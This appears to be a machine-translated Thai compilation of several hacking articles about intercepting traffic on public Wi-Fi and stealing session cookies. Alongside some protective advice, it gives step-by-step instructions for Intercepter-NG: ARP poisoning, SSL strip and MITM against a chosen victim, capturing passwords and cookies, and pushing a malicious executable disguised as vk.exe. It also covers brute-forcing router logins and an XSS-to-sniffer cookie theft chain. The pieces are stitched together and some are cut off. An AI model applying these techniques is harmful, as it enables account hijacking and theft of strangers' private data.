ทุกคนรู้โดยตรงถึงช่องโหว่ของการใช้รหัสผ่านมาตรฐาน Pass Mule เป็นไดเรกทอรีประเภทหนึ่งที่มีการเข้าสู่ระบบและรหัสผ่านมาตรฐานทุกประเภทสำหรับอุปกรณ์เครือข่าย มีการจัดระเบียบอย่างสะดวกตามชื่อผู้จำหน่าย ผลิตภัณฑ์ และรุ่น ดังนั้นการค้นหาสิ่งที่คุณต้องการจึงไม่ใช่เรื่องยาก โปรแกรมได้รับการออกแบบมาค่อนข้างเพื่อประหยัดเวลาในการค้นหาคู่มือสำหรับเราเตอร์การเข้าสู่ระบบมาตรฐานและรหัสผ่านที่คุณต้องค้นหา

การใช้ประโยชน์จากช่องโหว่

เป็นเรื่องยากที่จะจินตนาการถึงยูทิลิตี้การแฮ็กที่มากกว่า Metasploit และนั่นคือสิ่งที่สรุปการรีวิวของเราในวันนี้ Metasploit เป็นชุดเครื่องมือต่างๆ ที่มีหน้าที่หลักในการหาประโยชน์จากช่องโหว่ในซอฟต์แวร์ ลองนึกภาพ: การหาประโยชน์ที่เชื่อถือได้ พิสูจน์แล้ว และจำเป็นประมาณ 1,000 รายการในชีวิตประจำวันของเพนเทสเตอร์ - บนสมาร์ทโฟนของคุณ! ด้วยความช่วยเหลือของเครื่องมือดังกล่าว คุณสามารถสร้างตัวเองในทุกเครือข่ายได้ Metasploit ไม่เพียงแต่ช่วยให้คุณใช้ประโยชน์จากข้อบกพร่องในแอปพลิเคชันเซิร์ฟเวอร์เท่านั้น แต่ยังมีเครื่องมือสำหรับโจมตีแอปพลิเคชันไคลเอ็นต์อีกด้วย (เช่น ผ่านโมดูล Browser Autopwn เมื่อมีการแทรกเพย์โหลดการต่อสู้ลงในการรับส่งข้อมูลไคลเอ็นต์) ต้องบอกว่าไม่มีชุดเครื่องมือรุ่นมือถือ แต่คุณสามารถติดตั้งแพ็คเกจมาตรฐานบนอุปกรณ์ Apple โดยใช้ .

ผู้ใช้อินเทอร์เน็ตไม่ระมัดระวังอย่างยิ่ง การสูญเสียข้อมูลที่เป็นความลับนั้นง่ายพอๆ กับการปอกเปลือกลูกแพร์ สิ่งพิมพ์ 42.tut ได้ทำการทดลองเพื่อแสดงจำนวน "รู" ในเครือข่าย Wi-Fi สาธารณะ ข้อสรุปน่าผิดหวัง: ใครก็ตามที่ไม่มีทักษะและความรู้พิเศษสามารถสร้างเอกสารที่สมบูรณ์เกี่ยวกับบุคคลที่ใช้เพียงเครือข่ายไร้สายแบบเปิดได้

เราได้ติดตั้งแอปพลิเคชันหลายรายการสำหรับการทดสอบนี้ ฟังก์ชั่นต่างกัน แต่สาระสำคัญเหมือนกัน - เพื่อรวบรวมทุกสิ่งที่ผ่านเครือข่ายที่อุปกรณ์เชื่อมต่ออยู่ ไม่มีโปรแกรมใดที่ระบุว่าตนเป็น "ละเมิดลิขสิทธิ์" "แฮ็กเกอร์" หรือผิดกฎหมาย - สามารถดาวน์โหลดออนไลน์ได้โดยไม่มีปัญหาใดๆ การทดลองดำเนินการในศูนย์การค้าที่มี Wi-Fi ฟรี

การสกัดกั้น

เราเชื่อมต่อกับ Wi-Fi: ไม่มีรหัสผ่าน ชื่อเครือข่ายมีคำว่า "ฟรี" เราเริ่มสแกนหนึ่งในโปรแกรมค้นหาการเชื่อมต่อกับเครือข่าย 15 รายการทันที สำหรับทุกคนคุณสามารถดูที่อยู่ IP, ที่อยู่ MAC สำหรับบางคน - ชื่อของผู้ผลิตอุปกรณ์: Sony, Samsung, Apple, LG, HTC...

เราพบแล็ปท็อป "เหยื่อ" อยู่ในอุปกรณ์ต่างๆ เราเชื่อมต่อกับมัน - ข้อมูลที่ผ่านเครือข่ายเริ่มปรากฏบนหน้าจอ ข้อมูลทั้งหมดมีโครงสร้างตามเวลา มีแม้กระทั่งโปรแกรมดูข้อมูลที่ดักจับในตัว

บัตรประจำตัวผู้ใช้

เราก็ชมกันต่อไป เกมออนไลน์เริ่มต้นอย่างชัดเจนบนแล็ปท็อปของคู่หูของเขา: คำสั่งโปรแกรมถูกส่งไปยังเครือข่ายอย่างต่อเนื่อง ข้อมูลเกี่ยวกับสถานการณ์ในสนามรบกำลังได้รับ คุณสามารถดูชื่อเล่นของคู่ต่อสู้ ระดับเกมของพวกเขา และอื่นๆ อีกมากมาย

มีข้อความมาจาก "VKontakte" ในข้อกำหนดเฉพาะของข้อความโดยละเอียดข้อใดข้อหนึ่ง เราพบว่ารหัสผู้ใช้สามารถมองเห็นได้ในแต่ละข้อ หากคุณวางลงในเบราว์เซอร์ บัญชีของบุคคลที่ได้รับข้อความจะเปิดขึ้น

ขณะนี้ “เหยื่อ” กำลังเขียนข้อความตอบกลับ และไม่รู้ว่าเรากำลังดูรูปถ่ายในบัญชีของเขาอย่างชัดเจน แอปพลิเคชั่นโซเชียลเน็ตเวิร์กตัวหนึ่งให้สัญญาณ - เราสามารถฟังเสียงนี้ในเครื่องเล่นได้

รหัสผ่านและข้อความ

ภาพถ่ายและเสียงไม่ใช่ทั้งหมดที่สามารถ “ถ่ายโอน” ไปยัง Wi-Fi ที่มีอยู่ได้ ตัวอย่างเช่นหนึ่งในโปรแกรมมีแท็บแยกต่างหากสำหรับติดตามการติดต่อบนโซเชียลเน็ตเวิร์กและผู้ส่งข้อความด่วน ข้อความจะถูกถอดรหัสและจัดเรียงตามเวลาที่ส่ง

การแสดงข้อความโต้ตอบของผู้อื่นนั้นอยู่เหนือความดีและความชั่ว แต่มันได้ผล ตามภาพประกอบ นี่เป็นส่วนหนึ่งของบทสนทนาของผู้เขียนข้อความ ซึ่งคอมพิวเตอร์ติดตามจากอุปกรณ์ "เหยื่อ" จับได้

อีกโปรแกรมหนึ่งจะ “จัดเก็บ” คุกกี้และข้อมูลผู้ใช้ทั้งหมดแยกกัน รวมถึงรหัสผ่าน โชคดีที่อยู่ในรูปแบบที่เข้ารหัส แต่เสนอให้ติดตั้งยูทิลิตี้ที่จะถอดรหัสทันที

ข้อสรุป

ข้อมูลเกือบทุกอย่างสามารถสูญหายได้ผ่าน Wi-Fi เครือข่ายสาธารณะหลายแห่งไม่มีการป้องกันใดๆ เลย และบางครั้งก็มีรหัสผ่านด้วย ซึ่งหมายความว่าใครๆ ก็สามารถสกัดกั้นการรับส่งข้อมูลของเพื่อนร่วมงาน เพื่อน หรือคนแปลกหน้าได้

วิธีที่น่าเชื่อถือที่สุดในการออกจากสถานการณ์นี้คือวิธีหนึ่ง: อย่าส่งข้อมูลสำคัญใด ๆ ผ่านเครือข่ายสาธารณะ เช่น ห้ามส่งหมายเลขโทรศัพท์และรหัสผ่านทางข้อความ และห้ามชำระเงินด้วยบัตรชำระเงินนอกบ้าน ความเสี่ยงในการสูญเสียข้อมูลส่วนบุคคลมีสูงมาก

คุกกี้ - ข้อมูลในรูปแบบไฟล์ข้อความที่เว็บไซต์บันทึกไว้บนคอมพิวเตอร์ของผู้ใช้ ประกอบด้วยข้อมูลการตรวจสอบสิทธิ์ (ล็อกอิน/รหัสผ่าน ID หมายเลขโทรศัพท์ ที่อยู่กล่องจดหมาย) การตั้งค่าผู้ใช้ สถานะการเข้าถึง เก็บไว้ในโปรไฟล์เบราว์เซอร์

การแฮ็กคุกกี้ เป็นการขโมย (หรือ "การแย่งชิง") เซสชันของผู้เยี่ยมชมทรัพยากรบนเว็บ ข้อมูลส่วนตัวไม่เพียงแต่จะมีให้เฉพาะผู้ส่งและผู้รับเท่านั้น แต่ยังรวมถึงบุคคลที่สามด้วย - บุคคลที่ทำการสกัดกั้น

เครื่องมือและเทคนิคการแฮ็กคุกกี้

แน่นอนว่าโจรคอมพิวเตอร์เช่นเดียวกับเพื่อนร่วมงานในชีวิตจริงนอกเหนือจากทักษะความชำนาญและความรู้แล้วยังมีเครื่องมือของตัวเองอีกด้วย - คลังแสงของมาสเตอร์คีย์และโพรบ มาดูกลเม็ดยอดนิยมที่แฮกเกอร์ใช้ในการแยกคุกกี้จากผู้ใช้อินเทอร์เน็ตกัน

นักดมกลิ่น

โปรแกรมพิเศษสำหรับการตรวจสอบและวิเคราะห์การรับส่งข้อมูลเครือข่าย ชื่อของพวกเขามาจากคำกริยาภาษาอังกฤษว่า "sniff" (sniff) เพราะ แท้จริงแล้ว "ดมกลิ่น" แพ็กเก็ตที่ส่งระหว่างโหนด

แต่ผู้โจมตีใช้การดมกลิ่นเพื่อสกัดกั้นข้อมูลเซสชัน ข้อความ และข้อมูลลับอื่นๆ เป้าหมายของการโจมตีส่วนใหญ่เป็นเครือข่ายที่ไม่มีการป้องกัน โดยที่คุกกี้จะถูกส่งในเซสชัน HTTP แบบเปิด กล่าวคือ คุกกี้เหล่านั้นไม่ได้เข้ารหัสในทางปฏิบัติ (Wi-Fi สาธารณะมีความเสี่ยงมากที่สุดในเรื่องนี้)

หากต้องการฝังดมกลิ่นลงในช่องทางอินเทอร์เน็ตระหว่างโหนดผู้ใช้และเว็บเซิร์ฟเวอร์ ให้ใช้วิธีการต่อไปนี้:

  • “การฟัง” ไปยังอินเทอร์เฟซเครือข่าย (ฮับ สวิตช์)
  • การแตกแขนงและการคัดลอกทราฟฟิก
  • การเชื่อมต่อกับช่องว่างช่องสัญญาณเครือข่าย
  • การวิเคราะห์ผ่านการโจมตีพิเศษที่เปลี่ยนเส้นทางการรับส่งข้อมูลของเหยื่อไปยังการดมกลิ่น (การปลอมแปลง MAC, การปลอมแปลง IP)

XSS ตัวย่อย่อมาจาก Cross Site Scripting ใช้เพื่อโจมตีเว็บไซต์เพื่อขโมยข้อมูลผู้ใช้

หลักการของ XSS มีดังนี้:

  • ผู้โจมตีแทรกโค้ดที่เป็นอันตราย (สคริปต์ปลอมตัวพิเศษ) ลงในหน้าเว็บของเว็บไซต์ ฟอรัม หรือในข้อความ (เช่น เมื่อเกี่ยวข้องบนเครือข่ายโซเชียล)
  • เหยื่อไปที่หน้าที่ติดไวรัสและเปิดใช้งานรหัสที่ติดตั้งบนพีซีของเขา (คลิกติดตามลิงก์ ฯลฯ )
  • ในทางกลับกัน โค้ดที่เป็นอันตรายที่ถูกเรียกใช้งานจะ “แยก” ข้อมูลที่เป็นความลับของผู้ใช้ออกจากเบราว์เซอร์ (โดยเฉพาะคุกกี้) และส่งไปยังเว็บเซิร์ฟเวอร์ของผู้โจมตี

เพื่อ “ปลูกฝัง” กลไก XSS ของซอฟต์แวร์ แฮกเกอร์ใช้ช่องโหว่ทุกประเภทในเว็บเซิร์ฟเวอร์ บริการออนไลน์ และเบราว์เซอร์

ช่องโหว่ XSS ทั้งหมดแบ่งออกเป็นสองประเภท:

  • เฉยๆ. การโจมตีได้มาโดยการร้องขอสคริปต์เฉพาะบนหน้าเว็บ โค้ดที่เป็นอันตรายสามารถแทรกลงในรูปแบบต่างๆ บนหน้าเว็บได้ (เช่น ในแถบค้นหาไซต์) XSS แบบพาสซีฟที่อ่อนแอที่สุดคือทรัพยากรที่ไม่กรองแท็ก HTML เมื่อมีข้อมูลมาถึง
  • คล่องแคล่ว. ตั้งอยู่โดยตรงบนเซิร์ฟเวอร์ และพวกมันจะถูกเปิดใช้งานในเบราว์เซอร์ของเหยื่อ พวกมันถูกใช้อย่างแข็งขันโดยนักต้มตุ๋นในบล็อก แชท และฟีดข่าวทุกประเภท

แฮกเกอร์จะ “อำพราง” สคริปต์ XSS ของตนอย่างระมัดระวัง เพื่อที่เหยื่อจะได้ไม่สงสัยสิ่งใดๆ พวกเขาเปลี่ยนนามสกุลไฟล์ ส่งโค้ดเป็นรูปภาพ กระตุ้นให้พวกเขาคลิกลิงก์ และดึงดูดพวกเขาด้วยเนื้อหาที่น่าสนใจ ผลที่ตามมา: ผู้ใช้พีซีไม่สามารถควบคุมความอยากรู้ของตัวเองได้ด้วยมือของเขาเอง (ด้วยการคลิกเมาส์) ส่งคุกกี้เซสชัน (พร้อมล็อกอินและรหัสผ่าน!) ไปยังผู้เขียนสคริปต์ XSS - ผู้ร้ายคอมพิวเตอร์

การทดแทนคุกกี้

คุกกี้ทั้งหมดจะถูกบันทึกและส่งไปยังเว็บเซิร์ฟเวอร์ (ซึ่งคุกกี้ "มา") โดยไม่มีการเปลี่ยนแปลงใดๆ ในรูปแบบดั้งเดิม โดยมีค่า สตริง และข้อมูลอื่นๆ เหมือนกัน การปรับเปลี่ยนพารามิเตอร์โดยเจตนาเรียกว่าการทดแทนคุกกี้ กล่าวอีกนัยหนึ่ง เมื่อเปลี่ยนคุกกี้ ผู้โจมตีจะแสร้งทำเป็นกำลังคิดปรารถนา ตัวอย่างเช่น เมื่อชำระเงินในร้านค้าออนไลน์ คุกกี้จะเปลี่ยนจำนวนเงินที่ชำระลดลง - ดังนั้นจึงเกิด "การประหยัด" ในการซื้อ

คุกกี้เซสชันที่ถูกขโมยบนโซเชียลเน็ตเวิร์กจากบัญชีของบุคคลอื่นจะถูก "แทรก" ลงในเซสชันอื่นและบนพีซีเครื่องอื่น เจ้าของคุกกี้ที่ถูกขโมยจะสามารถเข้าถึงบัญชีของเหยื่อได้อย่างเต็มที่ (การโต้ตอบ เนื้อหา การตั้งค่าเพจ) ตราบใดที่เธอยังอยู่ในเพจของเธอ

คุกกี้ “การแก้ไข” ดำเนินการโดยใช้:

  • ฟังก์ชั่น “จัดการคุกกี้...” ในเบราว์เซอร์ Opera;
  • ตัวจัดการคุกกี้และตัวจัดการคุกกี้ขั้นสูงเสริมสำหรับ FireFox;
  • ยูทิลิตี้ IECookiesView (Internet Explorer เท่านั้น);
  • โปรแกรมแก้ไขข้อความ เช่น AkelPad, NotePad หรือ Windows Notepad

การเข้าถึงข้อมูลทางกายภาพ

รูปแบบการดำเนินการที่ง่ายมาก ประกอบด้วยหลายขั้นตอน แต่จะมีผลก็ต่อเมื่อคอมพิวเตอร์ของเหยื่อที่มีเซสชันเปิดเช่น VKontakte ถูกปล่อยทิ้งไว้โดยไม่มีใครดูแล (และเป็นเวลานาน!):

  1. ฟังก์ชันจาวาสคริปต์ถูกป้อนลงในแถบที่อยู่ของเบราว์เซอร์เพื่อแสดงคุกกี้ที่บันทึกไว้ทั้งหมด
  2. หลังจากกด "ENTER" ทั้งหมดจะปรากฏบนหน้า
  3. คุกกี้จะถูกคัดลอก บันทึกเป็นไฟล์ จากนั้นจึงโอนไปยังแฟลชไดรฟ์
  4. บนพีซีเครื่องอื่น คุกกี้จะถูกแทนที่ด้วยเซสชันใหม่
  5. อนุญาตให้เข้าถึงบัญชีของเหยื่อได้

ตามกฎแล้วแฮกเกอร์ใช้เครื่องมือข้างต้น (+ อื่น ๆ ) ทั้งสองอย่างร่วมกัน (เนื่องจากระดับการป้องกันในแหล่งข้อมูลบนเว็บหลายแห่งค่อนข้างสูง) และแยกกัน (เมื่อผู้ใช้ไร้เดียงสามากเกินไป)

XSS + ดมกลิ่น

  1. มีการสร้างสคริปต์ XSS ซึ่งระบุที่อยู่ของผู้ดมกลิ่นออนไลน์ (ทั้งแบบโฮมเมดหรือบริการเฉพาะ)
  2. โค้ดที่เป็นอันตรายจะถูกบันทึกโดยมีนามสกุล .img (รูปแบบรูปภาพ)
  3. จากนั้นไฟล์นี้จะถูกอัปโหลดไปยังหน้าเว็บไซต์ แชท หรือข้อความส่วนตัว ซึ่งเป็นที่ที่การโจมตีจะเกิดขึ้น
  4. ความสนใจของผู้ใช้ถูกดึงไปที่ "กับดัก" ที่สร้างขึ้น (นี่คือจุดที่วิศวกรรมสังคมมีผลบังคับใช้)
  5. หากกับดักถูกกระตุ้น คุกกี้จากเบราว์เซอร์ของเหยื่อจะถูกดักจับโดยนักดมกลิ่น
  6. ผู้โจมตีเปิดบันทึกการดมกลิ่นและดึงคุกกี้ที่ถูกขโมยมา
  7. จากนั้นจะดำเนินการทดแทนเพื่อรับสิทธิ์ของเจ้าของบัญชีโดยใช้เครื่องมือข้างต้น

ปกป้องคุกกี้จากการแฮ็ก

  1. ใช้การเชื่อมต่อที่เข้ารหัส (ใช้โปรโตคอลและวิธีการรักษาความปลอดภัยที่เหมาะสม)
  2. อย่าตอบสนองต่อลิงก์ รูปภาพ หรือข้อเสนอที่น่าสงสัยเพื่อทำความคุ้นเคยกับ "ซอฟต์แวร์ฟรีใหม่" โดยเฉพาะจากคนแปลกหน้า
  3. ใช้ทรัพยากรบนเว็บที่เชื่อถือได้เท่านั้น
  4. สิ้นสุดเซสชันที่ได้รับอนุญาตโดยคลิกปุ่ม "ออกจากระบบ" (ไม่ใช่แค่ปิดแท็บ!) โดยเฉพาะอย่างยิ่งหากคุณลงชื่อเข้าใช้บัญชีของคุณไม่ใช่จากคอมพิวเตอร์ส่วนบุคคล แต่จากพีซีในร้านอินเทอร์เน็ต
  5. อย่าใช้คุณสมบัติ "บันทึกรหัสผ่าน" ของเบราว์เซอร์ ข้อมูลการลงทะเบียนที่เก็บไว้จะเพิ่มความเสี่ยงของการโจรกรรมอย่างมาก อย่าขี้เกียจ อย่าเสียเวลาสักครู่ในการป้อนรหัสผ่านและเข้าสู่ระบบเมื่อเริ่มต้นแต่ละเซสชัน
  6. หลังจากการท่องเว็บ - เยี่ยมชมเครือข่ายโซเชียล ฟอรั่ม แชท เว็บไซต์ - ลบคุกกี้ที่บันทึกไว้และล้างแคชของเบราว์เซอร์
  7. อัปเดตเบราว์เซอร์และซอฟต์แวร์ป้องกันไวรัสเป็นประจำ
  8. ใช้ส่วนขยายเบราว์เซอร์ที่ป้องกันการโจมตี XSS (เช่น NoScript สำหรับ FF และ Google Chrome)
  9. ในบัญชีเป็นระยะๆ

และที่สำคัญที่สุดอย่าสูญเสียความระมัดระวังและความสนใจขณะพักผ่อนหรือทำงานบนอินเทอร์เน็ต!

สวัสดีเพื่อนๆ.

ตามที่สัญญาไว้ ฉันจะดำเนินการต่อเกี่ยวกับโปรแกรม Intercepter-ng

วันนี้จะมารีวิวในทางปฏิบัติ

คำเตือน: คุณไม่ควรเปลี่ยนการตั้งค่าหรือกดการตั้งค่าโดยไม่ตั้งใจ ที่ดีที่สุด มันอาจจะใช้งานไม่ได้ ไม่เช่นนั้นคุณจะปิด Wi-Fi ฉันมีกรณีที่การตั้งค่าเราเตอร์ถูกรีเซ็ต ดังนั้นอย่าคิดว่าทุกอย่างไม่เป็นอันตราย

และถึงแม้จะมีการตั้งค่าเหมือนกับของฉัน แต่ก็ไม่ได้หมายความว่าทุกอย่างจะทำงานได้อย่างราบรื่น ไม่ว่าในกรณีใด ในกรณีที่ร้ายแรง คุณจะต้องศึกษาการทำงานของโปรโตคอลและโหมดทั้งหมด

เรามาเริ่มต้นกันดีไหม?

การสกัดกั้นคุกกี้และรหัสผ่าน

เริ่มต้นด้วยการสกัดกั้นรหัสผ่านและคุกกี้แบบคลาสสิกโดยหลักการแล้วกระบวนการจะเหมือนกับในบทความเกี่ยวกับการสกัดกั้นรหัสผ่านผ่าน Wi-Fi และการสกัดกั้นคุกกี้ผ่าน Wi-Fi แต่ฉันจะเขียนใหม่อีกครั้งพร้อมชี้แจง

อย่างไรก็ตาม โปรแกรมป้องกันไวรัสมักจะสามารถยิงสิ่งเหล่านั้นและป้องกันการสกัดกั้นข้อมูลผ่าน Wi-Fi

หากเหยื่อใช้อุปกรณ์ Android หรือ IOS คุณจะพอใจกับสิ่งที่เหยื่อป้อนในเบราว์เซอร์เท่านั้น (รหัสผ่าน เว็บไซต์ คุกกี้) หากเหยื่อใช้โซเชียลไคลเอ็นต์สำหรับ VK ปัญหาก็เกิดขึ้น หยุดทำงาน. ใน Intercepter NG เวอร์ชันล่าสุด คุณสามารถแก้ไขปัญหาได้ด้วยการแทนที่ใบรับรองของเหยื่อ เพิ่มเติมเกี่ยวกับเรื่องนี้ในภายหลัง

ขั้นแรก ตัดสินใจว่าคุณต้องการอะไรจากเหยื่อ? บางทีคุณอาจต้องการรหัสผ่านสำหรับเครือข่ายโซเชียลหรือเฉพาะเว็บไซต์ บางทีคุกกี้อาจเพียงพอสำหรับคุณในการเข้าสู่ระบบในฐานะเหยื่อและดำเนินการบางอย่างทันที หรือคุณต้องการรหัสผ่านสำหรับการบันทึกในอนาคต คุณจำเป็นต้องวิเคราะห์ภาพที่เหยื่อดูและบางหน้าเพิ่มเติมหรือไม่ หรือคุณไม่ต้องการขยะพวกนี้? คุณรู้ไหมว่าเหยื่อได้เข้าสู่ไซต์แล้ว (ได้รับอนุญาตแล้วเมื่อมีการเปลี่ยนแปลง) หรือเขาจะป้อนข้อมูลของเขาเอง?

หากไม่จำเป็นต้องรับภาพจากแหล่งข้อมูลที่คุณเยี่ยมชม ไฟล์สื่อบางส่วน และดูบางเว็บไซต์ที่บันทึกไว้ในไฟล์ html ให้ปิดการใช้งานในการตั้งค่า - การฟื้นคืนชีพ วิธีนี้จะช่วยลดภาระบนเราเตอร์เล็กน้อย

สิ่งที่สามารถเปิดใช้งานได้ในการตั้งค่า - หากคุณเชื่อมต่อผ่านสายอีเธอร์เน็ต คุณจะต้องเปิดใช้งาน Spoof Ip/mac เปิดใช้งาน Cookie killer ด้วย (ช่วยรีเซ็ตคุกกี้เพื่อให้เหยื่อสามารถออกจากไซต์ได้) Cookie killer คือการโจมตีแบบ SSL Strip ดังนั้นอย่าลืมเปิดใช้งานมัน

นอกจากนี้ยังจะดีกว่าหากเปิดใช้งานโหมด Promiscious ซึ่งช่วยให้คุณปรับปรุงการสกัดกั้นได้ แต่ไม่ใช่ทุกโมดูลที่รองรับ... โหมด Extreme สามารถทำได้หากไม่มีมัน ด้วยเหตุนี้ บางครั้งพอร์ตต่างๆ จะถูกดักจับมากขึ้น แต่ก็มีข้อมูลเพิ่มเติม + โหลด...

ขั้นแรกให้เลือกอินเทอร์เฟซที่คุณเชื่อมต่อกับอินเทอร์เน็ตจากด้านบนและประเภทการเชื่อมต่อ: Wi-Fi หรืออีเธอร์เน็ตหากเชื่อมต่อผ่านสายเคเบิลกับเราเตอร์

ในโหมดสแกน คลิกขวาที่ช่องว่างแล้วคลิก Smart scan อุปกรณ์ทั้งหมดบนเครือข่ายจะถูกสแกน สิ่งที่เหลืออยู่คือการเพิ่มเหยื่อที่ต้องการลงใน Add nat

หรือคุณสามารถตั้งค่า IP ใดก็ได้ไปที่การตั้งค่า - โหมดผู้เชี่ยวชาญและทำเครื่องหมายที่ช่อง Auto ARP Pox ในกรณีนี้โปรแกรมจะเพิ่มทุกคนที่เชื่อมต่อและเชื่อมต่อกับเครือข่าย

สิ่งที่เราต้องทำคือเปลี่ยนไปใช้โหมด Nat

คลิกกำหนดค่า mitms ที่นี่เราจะต้องมี SSL mitm และแถบ SSL

SSL Mitmช่วยให้คุณสามารถสกัดกั้นข้อมูลได้ แม้ว่าเบราว์เซอร์จำนวนมากจะตอบสนองต่อข้อมูลดังกล่าวด้วยการเตือนเหยื่อก็ตาม

SSL สตริปอนุญาตให้เหยื่อเปลี่ยนจากโปรโตคอลที่ปลอดภัย Https เป็น HTTP รวมถึงให้ตัวจัดการคุกกี้ทำงานได้

เราไม่ต้องการอะไรอีกแล้ว คลิกเริ่มพิษ arp (ไอคอนรังสี) และรอกิจกรรมของเหยื่อ

ในส่วนโหมดรหัสผ่าน คลิกขวาและแสดงคูลี จากนั้นคุณสามารถคลิกขวาที่คุกกี้และไปที่ URL แบบเต็มได้

อย่างไรก็ตาม หากเหยื่ออยู่บนโซเชียลเน็ตเวิร์ก ก็มีโอกาสที่การติดต่อโต้ตอบของเขาจะปรากฏในโหมด Messenger

Http inject (ส่งไฟล์ไปให้เหยื่อ)

อืม เป็นตัวเลือกที่หวานมาก

คุณสามารถส่งมันไปให้เหยื่อเพื่อให้เธอดาวน์โหลดไฟล์ได้ เราหวังได้เพียงว่าเหยื่อจะเปิดไฟล์ เพื่อความน่าเชื่อถือ คุณสามารถวิเคราะห์ว่าไซต์ใดที่เหยื่อเข้าชมและแจ้งข้อมูลบางอย่างเช่นการอัปเดต

ตัวอย่างเช่น หากเหยื่ออยู่บน VK ให้ตั้งชื่อไฟล์ vk.exe บางทีเหยื่ออาจจะเปิดมันขึ้นมาโดยตัดสินใจว่ามันมีประโยชน์

มาเริ่มกันเลย


โหมดบรูตฟอร์ซ

โหมดเดารหัสผ่านและกำลังเดรัจฉาน

วิธีหนึ่งในการใช้งานคือการเข้าถึงแผงผู้ดูแลระบบเราเตอร์แบบดุร้าย รวมถึงโปรโตคอลอื่นๆ ด้วย

สำหรับบรูตัสคุณต้องการ

ในเซิร์ฟเวอร์เป้าหมายให้ป้อน IP ของเราเตอร์, โปรโตคอล telnet, ชื่อผู้ใช้ - ชื่อผู้ใช้ในกรณีของเรา ผู้ดูแลระบบ

ที่ด้านล่างจะมีปุ่มที่มีโฟลเดอร์วาดอยู่ ให้คลิกที่มันแล้วเปิดรายการรหัสผ่าน (ในโฟลเดอร์ที่มีโปรแกรม misc/pwlist.txt จะมีรายการรหัสผ่านที่ใช้บ่อย หรือคุณสามารถใช้ รายการของคุณเอง)

โหลดเสร็จแล้วกดสตาร์ท (สามเหลี่ยม) แล้วไปดื่มชา

หากมีการจับคู่กัน (เลือกรหัสผ่าน) โปรแกรมจะหยุดทำงาน

คุณจำเป็นต้องรู้ชื่อผู้ใช้ แต่ถ้าคุณต้องการเข้าถึงเราเตอร์ ให้ลองใช้ตัวมาตรฐาน - ผู้ดูแลระบบ

วิธีการผลิตเดรัจฉาน

ตัวเปลี่ยนการจราจร (ทดแทนการจราจร)

ฟังก์ชั่นนี้เป็นเรื่องตลกมากกว่า คุณสามารถเปลี่ยนแปลงได้เพื่อให้เหยื่อเมื่อเข้าสู่ไซต์หนึ่งไปยังอีกไซต์หนึ่งที่คุณเข้าไป

ในโหมดการจราจร ให้ป้อนคำขอทางด้านซ้าย ผลลัพธ์ทางด้านขวา แต่มีจำนวนตัวอักษรและสัญลักษณ์เท่ากัน ไม่เช่นนั้นจะไม่ทำงาน

ตัวอย่าง - ทางด้านซ้ายเราจะป้อนแบบสอบถามที่จะเปลี่ยนแปลง ทางด้านขวาเราจะเปลี่ยน test1 เป็น test2 (ทำเครื่องหมายที่ช่องปิดการใช้งาน HTTP gzip).

เข้าไปแล้วให้กด ADD แล้วกด OK

สุดท้ายนี้ วิดีโอเกี่ยวกับวิธีการสกัดกั้นข้อมูลจากไคลเอนต์ iOS เพราะอย่างที่คุณทราบ ในระหว่างการโจมตี Mitm แอปพลิเคชันของพวกเขาจะหยุดทำงาน

เร็วๆ นี้ฉันจะจัดทำวิดีโอเกี่ยวกับสิ่งที่เขียนในบทความ

เป็นการสกัดกั้นข้อมูลผ่าน Wi-Fi

นั่นคือทั้งหมดโดยพื้นฐาน มีอะไรเพิ่มเติมก็เขียน ถ้ามีอะไรต้องแก้ไขก็แค่เขียน

จนกว่าจะถึงครั้งต่อไป

คุกกี้คืออะไร?

มีกลไกที่อนุญาตให้เซิร์ฟเวอร์ http บันทึกข้อมูลข้อความบางส่วนบนคอมพิวเตอร์ของผู้ใช้แล้วเข้าถึงได้ ข้อมูลนี้เรียกว่าคุกกี้ โดยพื้นฐานแล้ว คุกกี้แต่ละตัวจะมีคู่กัน นั่นคือชื่อของพารามิเตอร์และค่าของมัน คุกกี้แต่ละตัวยังได้รับการกำหนดโดเมนที่มันอยู่ด้วย ด้วยเหตุผลด้านความปลอดภัย ในทุกเบราว์เซอร์ เซิร์ฟเวอร์ http จะได้รับอนุญาตให้เข้าถึงคุกกี้ของโดเมนเท่านั้น นอกจากนี้ คุกกี้อาจมีวันหมดอายุ ในกรณีนี้คุกกี้จะถูกจัดเก็บไว้ในคอมพิวเตอร์จนถึงวันที่นี้ แม้ว่าคุณจะปิดหน้าต่างเบราว์เซอร์ทั้งหมดก็ตาม


เหตุใดคุกกี้จึงมีความสำคัญ

ระบบที่มีผู้ใช้หลายรายทั้งหมดใช้คุกกี้เพื่อระบุผู้ใช้ แม่นยำยิ่งขึ้นคือการเชื่อมต่อปัจจุบันของผู้ใช้กับบริการ เซสชันผู้ใช้ หากมีใครรู้จักคุกกี้ของคุณ พวกเขาจะสามารถเข้าสู่ระบบในนามของคุณได้ เนื่องจากในขณะนี้มีทรัพยากรอินเทอร์เน็ตน้อยมากที่ตรวจสอบการเปลี่ยนแปลงที่อยู่ IP ในระหว่างเซสชันผู้ใช้หนึ่งครั้ง


จะเปลี่ยนหรือเปลี่ยนคุกกี้ได้อย่างไร?

นักพัฒนาเบราว์เซอร์ไม่มีเครื่องมือในตัวสำหรับการแก้ไขคุกกี้ แต่คุณสามารถใช้สมุดจดธรรมดาได้


ขั้นตอนที่ 1: สร้างไฟล์ข้อความพร้อมข้อความ

ตัวแก้ไขรีจิสทรีของ Windows เวอร์ชัน 5.00



@="C:\\IE_ext.htm"

บันทึกไว้ในชื่อ IE_ext.reg

ขั้นตอนที่ 2: ใช้ไฟล์ที่สร้างขึ้น เพิ่มการเปลี่ยนแปลงในรีจิสทรีของ Windows

ขั้นตอนที่ 3: สร้างไฟล์ข้อความพร้อมข้อความ

< script ภาษา = "จาวาสคริปต์">
external.menuArguments.clipboardData.setData("ข้อความ" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; โดเมน=testdomain.ru";
การแจ้งเตือน (external.menuArguments.document.cookie);


บันทึกไว้ในชื่อ C:\IE_ext.htm

ขั้นตอนที่ 4: เราไปที่เว็บไซต์ที่เราสนใจ

ขั้นตอนที่ 5: คลิกขวาบนพื้นที่ว่างบนหน้าและเลือกรายการเมนู "การทำงานกับคุกกี้"- อนุญาตให้เข้าถึงคลิปบอร์ด คุกกี้ของคุณจากไซต์นี้จะไปที่คลิปบอร์ด คุณสามารถใส่กระดาษจดและดูได้


